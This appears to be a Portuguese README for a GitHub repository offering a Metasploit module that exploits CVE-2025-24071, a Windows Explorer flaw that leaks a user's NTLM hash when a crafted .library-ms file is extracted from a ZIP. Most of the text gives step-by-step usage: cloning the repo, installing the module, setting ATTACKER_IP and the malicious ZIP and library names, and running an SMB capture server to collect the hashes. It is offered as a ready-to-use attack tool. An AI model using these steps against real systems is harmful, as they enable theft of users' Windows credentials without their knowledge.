
Módulo do Metasploit para CVE-2025-24071 - Vazamento de Hash NTLM do Windows via .library-ms
Este repositório contém um módulo do Metasploit para explorar o CVE-2025-24071, uma vulnerabilidade no Windows Explorer que vaza hashes NTLM quando um arquivo .library-ms malicioso é extraído de um arquivo ZIP.
Desenvolvido por: FOLKS-IWD
A vulnerabilidade ocorre quando um usuário extrai um arquivo ZIP contendo um arquivo .library-ms especialmente projetado. O Windows Explorer inicia automaticamente uma solicitação de autenticação SMB para um servidor remoto especificado no arquivo, vazando o hash NTLM do usuário sem qualquer interação.
Este módulo do Metasploit:
.library-ms malicioso.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Substitua pelo seu endereço IP
set FILENAME exploit.zip # Nome do arquivo ZIP malicioso
set LIBRARY_NAME malicious.library-ms # Nome do arquivo .library-ms
set SHARE_NAME shared # Nome do compartilhamento SMB
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Mesmo que ATTACKER_IP
run